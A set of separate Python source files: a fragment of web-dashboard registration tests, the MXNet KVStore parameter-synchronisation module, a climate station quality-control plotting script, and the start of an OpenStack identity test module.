def test_adding_registration_to_dashboard_increases_json_size_by_one(self, mock_from_kwargs):
mock_from_kwargs.return_value = Auth(user=self.user)
url = api_url_for('get_dashboard')
res = self.app.get(url + ALL_MY_REGISTRATIONS_ID)
init_len = len(res.json[u'data'])
RegistrationFactory(creator=self.user)
res = self.app.get(url + ALL_MY_REGISTRATIONS_ID)
assert_equal(len(res.json[u'data']), init_len + 1)
def assert_valid_hgrid_folder(node_hgrid):
folder_types = {
'name': str,
'children': list,
'contributors': list,
'dateModified': (DateTime, NoneType),
'node_id': str,
'modifiedDelta': int,
'modifiedBy': (dict, NoneType),
'urls': dict,
'isDashboard': bool,
'expand': bool,
'permissions': dict,
'isSmartFolder': bool,
'childrenCount': int,
}
keys_types = {
'urls': (str, NoneType),
'permissions': bool,
}
folder_values = {
'parentIsFolder': True,
'isPointer': False,
'isFolder': True,
'kind': 'folder',
'type': 'smart-folder'
}
if isinstance(node_hgrid, list):
node_hgrid = node_hgrid[0]['data']
else:
assert_is_instance(node_hgrid, dict)
for key, correct_value in folder_values.items():
assert_equal(node_hgrid[key], correct_value)
for key, correct_type in folder_types.items():
assert_is_instance(node_hgrid[key], correct_type)
for key, correct_type in keys_types.items():
for inner_key, inner_value in node_hgrid[key].items():
assert_is_instance(inner_value, correct_type)
valid_keys = set(folder_types.keys()).union(folder_values.keys())
for key in node_hgrid.keys():
assert_in(key, valid_keys)
def assert_valid_hgrid_smart_folder(node_hgrid):
smart_folder_values = {
'contributors': [],
'isPointer': False,
'dateModified': None,
'modifiedDelta': 0,
'modifiedBy': None,
'isSmartFolder': True,
'urls': {
'upload': None,
'fetch': None
},
'isDashboard': False,
'permissions': {
'edit': False,
'acceptsDrops': False,
'copyable': False,
'movable': False,
'view': True
}
}
assert_valid_hgrid_folder(node_hgrid)
for attr, correct_value in smart_folder_values.items():
assert_equal(correct_value, node_hgrid[attr])
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
""" Key value store interface of MXNet for parameter synchronization."""
import pickle
import ctypes
import os
from ..ndarray import NDArray
from ..ndarray import _ndarray_cls
from ..base import _LIB, c_str
from ..base import check_call, mx_uint, py_str
from ..base import NDArrayHandle, KVStoreHandle
from .. import optimizer as opt
from .base import _ctype_key_value, _ctype_dict, KVStoreBase
__all__ = ['KVStore']
def _updater_wrapper(updater):
"""A wrapper for the user-defined handle."""
def updater_handle(key, lhs_handle, rhs_handle, _):
""" ctypes function """
lhs = _ndarray_cls(NDArrayHandle(lhs_handle))
rhs = _ndarray_cls(NDArrayHandle(rhs_handle))
updater(key, lhs, rhs)
return updater_handle
def _get_kvstore_server_command_type(command):
command_types = {'kController': 0,
'kSetMultiPrecision': 1,
'kStopServer': 2,
'kSyncMode': 3,
'kSetGradientCompression': 4,
'kSetProfilerParams': 5}
assert (command in command_types), "Unknown command type to send to server"
return command_types[command]
class KVStore(KVStoreBase):
"""A key-value store for synchronization of values, over multiple devices."""
def __init__(self, handle):
"""Initializes a new KVStore.
Parameters
----------
handle : KVStoreHandle
`KVStore` handle of C API.
"""
assert isinstance(handle, KVStoreHandle)
self.handle = handle
self._updater = None
self._updater_func = None
self._str_updater_func = None
self._is_p3 = (os.getenv('DMLC_PS_VAN_TYPE', '') == 'p3')
def __del__(self):
check_call(_LIB.MXKVStoreFree(self.handle))
def broadcast(self, key, value, out, priority=0):
""" Broadcast the `value` NDArray at rank 0 to all ranks,
and store the result in `out`.
Note that the native KVStore does not support broadcasting the same key more than once.
Parameters
----------
key : str, or int
The key.
value : NDArray, list of NDArray, or list of list of NDArray
Values corresponding to the keys.
out: NDArray or list of NDArray or list of list of NDArray
Outputs corresponding to the keys.
priority : int, optional
The priority of the operation.
Higher priority operations are likely to be executed before other actions.
Examples
--------
>>> # broadcast a single key-value pair
>>> shape = (2,3)
>>> kv = mx.kv.create('local')
>>> a = mx.nd.zeros(shape)
>>> kv.broadcast('3', mx.nd.ones(shape)*2, out=a)
>>> print a.asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
"""
cvkeys, cvals, use_str_keys = _ctype_key_value(key, value)
cokeys, couts, _ = _ctype_key_value(key, out)
if use_str_keys:
check_call(_LIB.MXKVStoreBroadcastEx(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStoreBroadcast(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
def is_capable(self, capability):
"""Queries if the KVStore type supports certain capability, such as optimizer algorithm,
gradient compression, sparsity, etc.
Parameters
----------
capability: str
The capability to query
Returns
-------
result : bool
Whether the capability is supported or not.
"""
if capability.lower() == KVStoreBase.OPTIMIZER:
return not self._is_p3
else:
raise ValueError('Unknown capability: {}'.format(capability))
def init(self, key, value):
""" Initializes a single or a sequence of key-value pairs into the store.
For each key, one must `init` it before calling `push` or `pull`.
When multiple workers invoke `init` for the same key, only
the value supplied by worker with rank `0` is used. This function returns
after data has been initialized successfully.
Parameters
----------
key : str, int, or sequence of str or int
The keys.
value : NDArray, RowSparseNDArray or sequence of NDArray or RowSparseNDArray
Values corresponding to the keys.
Examples
--------
>>> # init a single key-value pair
>>> shape = (2,3)
>>> kv = mx.kv.create('local')
>>> kv.init('3', mx.nd.ones(shape)*2)
>>> a = mx.nd.zeros(shape)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # init a list of key-value pairs
>>> keys = ['5', '7', '9']
>>> kv.init(keys, [mx.nd.ones(shape)]*len(keys))
>>> # init a row_sparse value
>>> kv.init('4', mx.nd.ones(shape).tostype('row_sparse'))
>>> b = mx.nd.sparse.zeros('row_sparse', shape)
>>> kv.row_sparse_pull('4', row_ids=mx.nd.array([0, 1]), out=b)
>>> print b
<RowSparseNDArray 2x3 @cpu(0)>
"""
ckeys, cvals, use_str_keys = _ctype_key_value(key, value)
if use_str_keys:
check_call(_LIB.MXKVStoreInitEx(self.handle, mx_uint(len(ckeys)), ckeys, cvals))
else:
check_call(_LIB.MXKVStoreInit(self.handle, mx_uint(len(ckeys)), ckeys, cvals))
def push(self, key, value, priority=0):
""" Pushes a single or a sequence of key-value pairs into the store.
This function returns immediately after adding an operator to the engine.
The actual operation is executed asynchronously. If there are consecutive
pushes to the same key, there is no guarantee on the serialization of pushes.
The execution of a push does not guarantee that all previous pushes are
finished.
There is no synchronization between workers.
One can use ``_barrier()`` to sync all workers.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
value : NDArray, RowSparseNDArray, list of NDArray or RowSparseNDArray,
or list of list of NDArray or RowSparseNDArray
Values corresponding to the keys.
priority : int, optional
The priority of the push operation.
Higher priority push operations are likely to be executed before
other push actions.
Examples
--------
>>> # push a single key-value pair
>>> shape = (2,3)
>>> kv.push('3', mx.nd.ones(shape)*8)
>>> kv.pull('3', out=a) # pull out the value
>>> print a.asnumpy()
[[ 8. 8. 8.]
[ 8. 8. 8.]]
>>> # aggregate the value and the push
>>> gpus = [mx.gpu(i) for i in range(4)]
>>> b = [mx.nd.ones(shape, gpu) for gpu in gpus]
>>> kv.push('3', b)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> # push a list of keys.
>>> # single device
>>> keys = ['4', '5', '6']
>>> kv.push(keys, [mx.nd.ones(shape)]*len(keys))
>>> b = [mx.nd.zeros(shape)]*len(keys)
>>> kv.pull(keys, out=b)
>>> print b[1].asnumpy()
[[ 1. 1. 1.]
[ 1. 1. 1.]]
>>> # multiple devices:
>>> keys = ['7', '8', '9']
>>> b = [[mx.nd.ones(shape, gpu) for gpu in gpus]] * len(keys)
>>> kv.push(keys, b)
>>> kv.pull(keys, out=b)
>>> print b[1][1].asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> # push a row_sparse value
>>> b = mx.nd.sparse.zeros('row_sparse', shape)
>>> kv.init('10', mx.nd.sparse.zeros('row_sparse', shape))
>>> kv.push('10', mx.nd.ones(shape).tostype('row_sparse'))
>>> # pull out the value
>>> kv.row_sparse_pull('10', row_ids=mx.nd.array([0, 1]), out=b)
>>> print b
<RowSparseNDArray 2x3 @cpu(0)>
"""
ckeys, cvals, use_str_keys = _ctype_key_value(key, value)
if use_str_keys:
check_call(_LIB.MXKVStorePushEx(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStorePush(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, ctypes.c_int(priority)))
def pull(self, key, out=None, priority=0, ignore_sparse=True):
""" Pulls a single value or a sequence of values from the store.
This function returns immediately after adding an operator to the engine.
Subsequent attempts to read from the `out` variable will be blocked until the
pull operation completes.
`pull` is executed asynchronously after all previous `pull` calls and only
the last `push` call for the same input key(s) are finished.
The returned values are guaranteed to be the latest values in the store.
pull with `RowSparseNDArray` is not supported for dist kvstore.
Please use ``row_sparse_pull`` instead.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
out: NDArray or list of NDArray or list of list of NDArray
Values corresponding to the keys.
priority : int, optional
The priority of the pull operation.
Higher priority pull operations are likely to be executed before
other pull actions.
ignore_sparse: bool, optional, default True
Whether to ignore sparse arrays in the request.
Examples
--------
>>> # pull a single key-value pair
>>> shape = (2,3)
>>> a = mx.nd.zeros(shape)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # pull into multiple devices
>>> b = [mx.nd.ones(shape, gpu) for gpu in gpus]
>>> kv.pull('3', out=b)
>>> print b[1].asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # pull a list of key-value pairs.
>>> # On single device
>>> keys = ['5', '7', '9']
>>> b = [mx.nd.zeros(shape)]*len(keys)
>>> kv.pull(keys, out=b)
>>> print b[1].asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
>>> # On multiple devices
>>> keys = ['6', '8', '10']
>>> b = [[mx.nd.ones(shape, gpu) for gpu in gpus]] * len(keys)
>>> kv.pull(keys, out=b)
>>> print b[1][1].asnumpy()
[[ 2. 2. 2.]
[ 2. 2. 2.]]
"""
assert(out is not None)
ckeys, cvals, use_str_keys = _ctype_key_value(key, out)
if use_str_keys:
check_call(_LIB.MXKVStorePullWithSparseEx(self.handle, mx_uint(len(ckeys)), ckeys,
cvals, ctypes.c_int(priority),
ctypes.c_bool(ignore_sparse)))
else:
check_call(_LIB.MXKVStorePullWithSparse(self.handle, mx_uint(len(ckeys)), ckeys,
cvals, ctypes.c_int(priority),
ctypes.c_bool(ignore_sparse)))
def pushpull(self, key, value, out=None, priority=0):
""" Performs push and pull a single value or a sequence of values from the store.
This function is coalesced form of push and pull operations. This function returns
immediately after adding an operator to the engine. Subsequent attempts to read
from the `out` variable will be blocked until the pull operation completes.
`value` is pushed to the kvstore server for the specified keys and the updated
values are pulled from the server to `out`. If `out` is not specified the pulled
values are written to `value`. The returned values are guaranteed to be the latest
values in the store.
pushpull with `RowSparseNDArray` is not supported for dist kvstore.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
value : NDArray, list of NDArray, or list of list of NDArray
Values corresponding to the keys.
out: NDArray or list of NDArray or list of list of NDArray, optional
Outputs corresponding to the keys.
priority : int, optional
The priority of the operation.
Higher priority operations are likely to be executed before other actions.
Examples
--------
>>> # pushpull a single key-value pair
>>> shape = (2,3)
>>> kv.pushpull('3', mx.nd.ones(shape)*8, out=a)
>>> print a.asnumpy()
[[ 8. 8. 8.]
[ 8. 8. 8.]]
>>> # aggregate the value and then pushpull
>>> gpus = [mx.gpu(i) for i in range(4)]
>>> b = [mx.nd.ones(shape, gpu) for gpu in gpus]
>>> kv.pushpull('3', b, out=a)
>>> print a.asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> # pushpull a list of keys.
>>> # single device
>>> keys = ['4', '5', '6']
>>> b = [mx.nd.zeros(shape)]*len(keys)
>>> kv.pushpull(keys, [mx.nd.ones(shape)]*len(keys), out=b)
>>> print b[1].asnumpy()
[[ 1. 1. 1.]
[ 1. 1. 1.]]
>>> # multiple devices:
>>> keys = ['7', '8', '9']
>>> b = [[mx.nd.ones(shape, gpu) for gpu in gpus]] * len(keys)
>>> kv.pushpull(keys, b)
>>> print b[1][1].asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
"""
cvkeys, cvals, use_str_keys = _ctype_key_value(key, value)
if out is not None:
cokeys, couts, _ = _ctype_key_value(key, out)
else:
cokeys = cvkeys
couts = cvals
if use_str_keys:
check_call(_LIB.MXKVStorePushPullEx(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStorePushPull(
self.handle, mx_uint(len(cvkeys)), cvkeys, mx_uint(len(cokeys)), cokeys,
cvals, couts, ctypes.c_int(priority)))
def row_sparse_pull(self, key, out=None, priority=0, row_ids=None):
""" Pulls a single RowSparseNDArray value or a sequence of RowSparseNDArray values \
from the store with specified row_ids. When there is only one row_id, KVStoreRowSparsePull \
is invoked just once and the result is broadcast to all the rest of outputs.
`row_sparse_pull` is executed asynchronously after all previous
`pull`/`row_sparse_pull` calls and the last `push` call for the
same input key(s) are finished.
The returned values are guaranteed to be the latest values in the store.
Parameters
----------
key : str, int, or sequence of str or int
Keys.
out: RowSparseNDArray or list of RowSparseNDArray or list of list of RowSparseNDArray
Values corresponding to the keys. The stype is expected to be row_sparse
priority : int, optional
The priority of the pull operation.
Higher priority pull operations are likely to be executed before
other pull actions.
row_ids : NDArray or list of NDArray
The row_ids for which to pull for each value. Each row_id is an 1-D NDArray \
whose values don't have to be unique nor sorted.
Examples
--------
>>> shape = (3, 3)
>>> kv.init('3', mx.nd.ones(shape).tostype('row_sparse'))
>>> a = mx.nd.sparse.zeros('row_sparse', shape)
>>> row_ids = mx.nd.array([0, 2], dtype='int64')
>>> kv.row_sparse_pull('3', out=a, row_ids=row_ids)
>>> print a.asnumpy()
[[ 1. 1. 1.]
[ 0. 0. 0.]
[ 1. 1. 1.]]
>>> duplicate_row_ids = mx.nd.array([2, 2], dtype='int64')
>>> kv.row_sparse_pull('3', out=a, row_ids=duplicate_row_ids)
>>> print a.asnumpy()
[[ 0. 0. 0.]
[ 0. 0. 0.]
[ 1. 1. 1.]]
>>> unsorted_row_ids = mx.nd.array([1, 0], dtype='int64')
>>> kv.row_sparse_pull('3', out=a, row_ids=unsorted_row_ids)
>>> print a.asnumpy()
[[ 1. 1. 1.]
[ 1. 1. 1.]
[ 0. 0. 0.]]
"""
assert(out is not None)
assert(row_ids is not None)
if isinstance(row_ids, NDArray):
row_ids = [row_ids]
assert(isinstance(row_ids, list)), \
"row_ids should be NDArray or list of NDArray"
first_out = out
# whether row_ids are the same
single_rowid = False
if len(row_ids) == 1 and isinstance(out, list):
single_rowid = True
first_out = [out[0]]
ckeys, cvals, use_str_keys = _ctype_key_value(key, first_out)
_, crow_ids, _ = _ctype_key_value(key, row_ids)
assert(len(crow_ids) == len(cvals)), \
"the number of row_ids doesn't match the number of values"
if use_str_keys:
check_call(_LIB.MXKVStorePullRowSparseEx(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, crow_ids, ctypes.c_int(priority)))
else:
check_call(_LIB.MXKVStorePullRowSparse(
self.handle, mx_uint(len(ckeys)), ckeys, cvals, crow_ids, ctypes.c_int(priority)))
# the result can be copied to other devices without invoking row_sparse_pull
# if the indices are the same
if single_rowid:
for out_i in out[1:]:
out[0].copyto(out_i)
def set_gradient_compression(self, compression_params):
""" Specifies type of low-bit quantization for gradient compression \
and additional arguments depending on the type of compression being used.
The 1bit compression works as follows: values which is above the threshold in the
gradient will be set to +1, whereas values below threshold will be set to -1.
2bit Gradient Compression takes a positive float `threshold`.
The technique works by thresholding values such that positive values in the
gradient above threshold will be set to threshold. Negative values whose absolute
values are higher than threshold, will be set to the negative of threshold.
Values whose absolute values are less than threshold will be set to 0.
By doing so, each value in the gradient is in one of three states. 2bits are
used to represent these states, and every 16 float values in the original
gradient can be represented using one float. This compressed representation
can reduce communication costs. The difference between these thresholded values and
original values is stored at the sender's end as residual and added to the
gradient in the next iteration.
When kvstore is 'local', gradient compression is used to reduce communication
between multiple devices (gpus). Gradient is quantized on each GPU which
computed the gradients, then sent to the GPU which merges the gradients. This
receiving GPU dequantizes the gradients and merges them. Note that this
increases memory usage on each GPU because of the residual array stored.
When kvstore is 'dist', gradient compression is used to reduce communication
from worker to sender. Gradient is quantized on each worker which
computed the gradients, then sent to the server which dequantizes
this data and merges the gradients from each worker. Note that this
increases CPU memory usage on each worker because of the residual array stored.
Only worker to server communication is compressed in this setting.
If each machine has multiple GPUs, currently this GPU to GPU or GPU to CPU communication
is not compressed. Server to worker communication (in the case of pull)
is also not compressed.
To use 2bit compression, we need to specify `type` as `2bit`.
Only specifying `type` would use default value for the threshold.
To completely specify the arguments for 2bit compression, we would need to pass
a dictionary which includes `threshold` like:
{'type': '2bit', 'threshold': 0.5}
Parameters
----------
compression_params : dict
A dictionary specifying the type and parameters for gradient compression.
The key `type` in this dictionary is a
required string argument and specifies the type of gradient compression.
Currently `type` can be only `1bit` and `2bit`
Other keys in this dictionary are optional and specific to the type
of gradient compression.
"""
if ('device' in self.type) or ('dist' in self.type): # pylint: disable=unsupported-membership-test
ckeys, cvals = _ctype_dict(compression_params)
check_call(_LIB.MXKVStoreSetGradientCompression(self.handle,
mx_uint(len(compression_params)),
ckeys, cvals))
else:
raise Exception('Gradient compression is not supported for this type of kvstore')
def set_optimizer(self, optimizer):
""" Registers an optimizer with the kvstore.
When using a single machine, this function updates the local optimizer.
If using multiple machines and this operation is invoked from a worker node,
it will serialized the optimizer with pickle and send it to all servers.
The function returns after all servers have been updated.
Parameters
----------
optimizer : Optimizer
The new optimizer for the store
Examples
--------
>>> kv = mx.kv.create()
>>> shape = (2, 2)
>>> weight = mx.nd.zeros(shape)
>>> kv.init(3, weight)
>>> # set the optimizer for kvstore as the default SGD optimizer
>>> kv.set_optimizer(mx.optimizer.SGD())
>>> grad = mx.nd.ones(shape)
>>> kv.push(3, grad)
>>> kv.pull(3, out = weight)
>>> # weight is updated via gradient descent
>>> weight.asnumpy()
array([[-0.01, -0.01],
[-0.01, -0.01]], dtype=float32)
"""
is_worker = ctypes.c_int()
check_call(_LIB.MXKVStoreIsWorkerNode(ctypes.byref(is_worker)))
# pylint: disable=invalid-name
if 'dist' in self.type and is_worker.value: # pylint: disable=unsupported-membership-test
# send the optimizer to server
try:
# use ASCII protocol 0, might be slower, but not a big ideal
optim_str = py_str(pickle.dumps(optimizer, 0))
except:
raise
cmd = _get_kvstore_server_command_type('kController')
self._send_command_to_servers(cmd, optim_str)
if optimizer.multi_precision:
cmd = _get_kvstore_server_command_type('kSetMultiPrecision')
self._send_command_to_servers(cmd, '')
else:
self._set_updater(opt.get_updater(optimizer))
@property
def type(self):
""" Returns the type of this kvstore.
Returns
-------
type : str
the string type
"""
kv_type = ctypes.c_char_p()
check_call(_LIB.MXKVStoreGetType(self.handle, ctypes.byref(kv_type)))
return py_str(kv_type.value)
@property
def rank(self):
""" Returns the rank of this worker node.
Returns
-------
rank : int
The rank of this node, which is in range [0, num_workers())
"""
rank = ctypes.c_int()
check_call(_LIB.MXKVStoreGetRank(self.handle, ctypes.byref(rank)))
return rank.value
@property
def num_workers(self):
"""Returns the number of worker nodes.
Returns
-------
size :int
The number of worker nodes.
"""
size = ctypes.c_int()
check_call(_LIB.MXKVStoreGetGroupSize(self.handle, ctypes.byref(size)))
return size.value
def save_optimizer_states(self, fname, dump_optimizer=False):
"""Saves the optimizer (updater) state to a file. This is often used when checkpointing
the model during training.
Parameters
----------
fname : str
Path to the output states file.
dump_optimizer : bool, default False
Whether to also save the optimizer itself. This would also save optimizer
information such as learning rate and weight decay schedules.
"""
assert self._updater is not None, "Cannot save states for distributed training"
with open(fname, 'wb') as fout:
fout.write(self._updater.get_states(dump_optimizer))
def load_optimizer_states(self, fname):
"""Loads the optimizer (updater) state from the file.
Parameters
----------
fname : str
Path to input states file.
"""
assert self._updater is not None, "Cannot load states for distributed training"
self._updater.set_states(open(fname, 'rb').read())
def _set_updater(self, updater):
"""Sets a push updater into the store.
This function only changes the local store. When running on multiple machines one must
use `set_optimizer`.
Parameters
----------
updater : function
The updater function.
Examples
--------
>>> def update(key, input, stored):
... print "update on key: %d" % key
... stored += input * 2
>>> kv._set_updater(update)
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 4. 4. 4.]
[ 4. 4. 4.]]
>>> kv.push('3', mx.nd.ones(shape))
update on key: 3
>>> kv.pull('3', out=a)
>>> print a.asnumpy()
[[ 6. 6. 6.]
[ 6. 6. 6.]]
"""
self._updater = updater
# set updater with int keys
_updater_proto = ctypes.CFUNCTYPE(
None, ctypes.c_int, NDArrayHandle, NDArrayHandle, ctypes.c_void_p)
self._updater_func = _updater_proto(_updater_wrapper(updater))
# set updater with str keys
_str_updater_proto = ctypes.CFUNCTYPE(
None, ctypes.c_char_p, NDArrayHandle, NDArrayHandle, ctypes.c_void_p)
self._str_updater_func = _str_updater_proto(_updater_wrapper(updater))
check_call(_LIB.MXKVStoreSetUpdaterEx(self.handle, self._updater_func,
self._str_updater_func, None))
def _barrier(self):
"""Invokes global barrier among all worker nodes.
For example, assume there are `n` machines. We would like machine `0` to first
`init` the values and then have all the workers `pull` the initialized value.
Before pulling, we can place invoke `_barrier()` to guarantee that the
initialization is finished.
"""
check_call(_LIB.MXKVStoreBarrier(self.handle))
def _send_command_to_servers(self, head, body):
"""Sends a command to all server nodes.
Sending command to a server node will cause that server node to invoke
``KVStoreServer.controller`` to execute the command.
This function returns after the command has been executed on all server
nodes.
Parameters
----------
head : int
the head of the command.
body : str
the body of the command.
"""
check_call(_LIB.MXKVStoreSendCommmandToServers(
self.handle, mx_uint(head), c_str(body)))
|
|
#!/usr/local/sci/bin/python
#*****************************
#
# plot failure rate for each test and overall for variables
#
#
#************************************************************************
# SVN Info
#$Rev:: 120 $: Revision of last commit
#$Author:: rdunn $: Author of last commit
#$Date:: 2017-02-24 10:34:07 +0000 (Fri, 24 Feb 2017) $: Date of last commit
#************************************************************************
import numpy as np
import datetime as dt
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
# RJHD utils
import qc_utils as utils
import netcdf_procs as ncdfp
from set_paths_and_vars import *
#*******************************************************
qc_test=['DUP','TFV','DFV','SFV','DNL','TGP','DGP','SGP','TRC','DRC',\
'WRC','PRC','TSS','DSS','WSS','PSS','HTS','HDS','HWS','HPS',\
'DTS','DDS','DWS','DPS','TCM','DCM','PCM','TSP','DSP','PSP','WSP'\
'SSS','DPD','DCF','CUOT','CUOL','CUOM','CUOH','CST','FLW','FMC',\
'NGC','TOT','DOT','SOT','TMB','DMB','SMB','WMB','BBB','CMB',\
'LMB','MMB','HMB','BMB','OCT','OCD','OCW','OCS','TVR','DVR',\
'SVR','WVR','WSL','WDL','WRS','STR_T','STR_D','STR_w','STR_S','ALL_T','ALL_Td','ALL_SLP','ALL_W','ACL']
# list of tests not the same as where they were applied to!
T_QC=[0,1,4,5,8,12,16,20,24,27,41,44,54,58]
D_QC=[0,2,4,6,8,9,13,17,21,25,28,30,31,32,42,45,55,59]
S_QC=[0,3,4,7,11,15,19,23,26,29,43,46,57,60] # 26 should be empty
WS_QC=[0,10,14,18,22,47,56,61,62,63,64,65]
WD_QC=[0,10,14,18,22,47,48,56,61,62,63,64,65,66,67,68]
C_QC=range(33,41)
strT_QC=[12,16,20]
strD_QC=[13,17,21]
strWS_QC=[14,18,22]
strWD_QC=[66,67,68]
strS_QC=[15,19,23]
station_list = "candidate_stations.txt"
process_vars = ["temperatures","dewpoints","slp","windspeeds","winddirs","total_cloud_cover"]
diagnostics = False
start_time_string = dt.datetime.strftime(dt.datetime.now(), "%Y%m%d")
try:
station_info = np.genfromtxt(os.path.join(INPUT_FILE_LOCS, station_list), dtype=(str))
except IOError:
print "station list not found"
sys.exit()
all_flag_sums = np.zeros([len(station_info), len(qc_test)+6])
all_flag_pct = np.zeros([len(station_info), len(qc_test)])
Lons = []
Lats = []
uk_stns = []
for st,stat in enumerate(station_info):
# set up station
station = utils.Station(stat[0], float(stat[1]), float(stat[2]), float(stat[3]))
# if station.id[:2] != "03":
# continue
print st, station.id
# read attributes and qc_flags
ncdfp.read(os.path.join(NETCDF_DATA_LOCS, station.id + "_mask.nc"), station, process_vars, [], diagnostics = diagnostics)
# sum qc_flags:
# remove multi-level flagging
qc_flags = station.qc_flags[:]
qc_flags[qc_flags[:] > 1] = 1
# remove multi-level flagging - neighbour flags
no_neighbours = qc_flags[qc_flags[:] == -1].size
qc_flags[qc_flags[:] < 0] = 0
total_flags = qc_flags[qc_flags[:] != 0].size
sum_flags = np.sum(qc_flags[:], axis = 0) # 61 column array
for cols in [strT_QC, strD_QC, strWS_QC, strWD_QC, strS_QC, T_QC, D_QC, S_QC, WS_QC, WD_QC, C_QC]:
sum_flags = np.append(sum_flags, np.sum(sum_flags[cols]))
all_flag_sums[st] = sum_flags
# now do percentage flagged of total obs
pct_flag = np.zeros(len(qc_test), dtype = float)
for t,test in enumerate(qc_test):
if t in T_QC:
if station.temperatures.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.temperatures.data.compressed().size
elif t in D_QC:
if station.dewpoints.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.dewpoints.data.compressed().size
elif t in S_QC:
if station.slp.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.slp.data.compressed().size
elif t in WS_QC:
if station.windspeeds.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.windspeeds.data.compressed().size
elif t in WD_QC:
if station.winddirs.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.winddirs.data.compressed().size
elif t in C_QC:
if station.total_cloud_cover.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.total_cloud_cover.data.size
else:
if station.temperatures.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.temperatures.data.size
all_flag_pct[st] = 100. * pct_flag
# get occasions when more locations are flagged than have data.
over_100, = np.where(all_flag_pct[st] > 100.)
all_flag_pct[st][over_100] = 100.
Lons += [station.lon]
Lats += [station.lat]
uk_stns += [st]
Lats = np.array(Lats)
Lons = np.array(Lons)
outfile = file(INPUT_FILE_LOCS+"all_fails_summary_{}.dat".format(start_time_string),'w')
for t,test in enumerate(qc_test):
plt.figure(figsize=(8,6))
plt.clf()
ax = plt.axes([0,0,1,1],projection = ccrs.Robinson())
ax.set_global()
ax.coastlines('50m')
try:
ax.gridlines(draw_labels = True)
except TypeError:
ax.gridlines()
# colors are the exact same RBG codes as in IDL
colors = [(150,150,150),(41,10,216),(63,160,255),(170,247,255),(255,224,153),(247,109,94),(165,0,33),(0,0,0)]
limits = [0.0, 0.1, 0.2, 0.5, 1.0, 2.0, 5.0, 100.]
all_locs = []
for u, upper in enumerate(limits):
if u == 0:
locs, = np.where(all_flag_pct[uk_stns,t] == 0)
label = "{}%: {}".format(upper, len(locs))
else:
locs, = np.where(np.logical_and(all_flag_pct[uk_stns,t] <= upper, all_flag_pct[uk_stns,t] > limits[u-1]))
label = ">{} to {}%: {}".format(limits[u-1], upper, len(locs))
if upper == limits[-1]:
label = ">{}%: {}".format(limits[u-1], len(locs))
if len(locs) > 0:
ax.scatter(Lons[locs], Lats[locs], transform = ccrs.Geodetic(), s = 15, c = tuple([float(c)/255 for c in colors[u]]), edgecolors="none", label = label)
else:
ax.scatter([0], [-90], transform = ccrs.Geodetic(), s = 15, c = tuple([float(c)/255 for c in colors[u]]), edgecolors="none", label = label)
all_locs += [len(locs)]
if test != "ALL_SLP":
plt.title(" ".join([s.capitalize() for s in test.split("_")]))
else:
plt.title("All SLP")
watermarkstring="/".join(os.getcwd().split('/')[4:])+'/'+os.path.basename( __file__ )+" "+dt.datetime.strftime(dt.datetime.now(), "%d-%b-%Y %H:%M")
plt.figtext(0.01,0.01,watermarkstring,size=5)
leg=plt.legend(loc='lower center',ncol=4, bbox_to_anchor = (0.5,-0.2), frameon=False, title='',prop={'size':11},labelspacing=0.15,columnspacing=0.5, numpoints=1)
plt.savefig(IMAGE_LOCS+"All_fails_{}_{}.png".format(test, start_time_string))
plt.close()
outfile.write("{:10s}".format(test)+''.join(['%7i' % n for n in all_locs])+''.join(["%7.1f" % n for n in [100.*n/len(Lats) for n in all_locs]])+"\n")
outfile.close()
#*******************************************************
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.identity.v3 import _proxy
from openstack.identity.v3 import credential
from openstack.identity.v3 import domain
from openstack.identity.v3 import endpoint
from openstack.identity.v3 import group
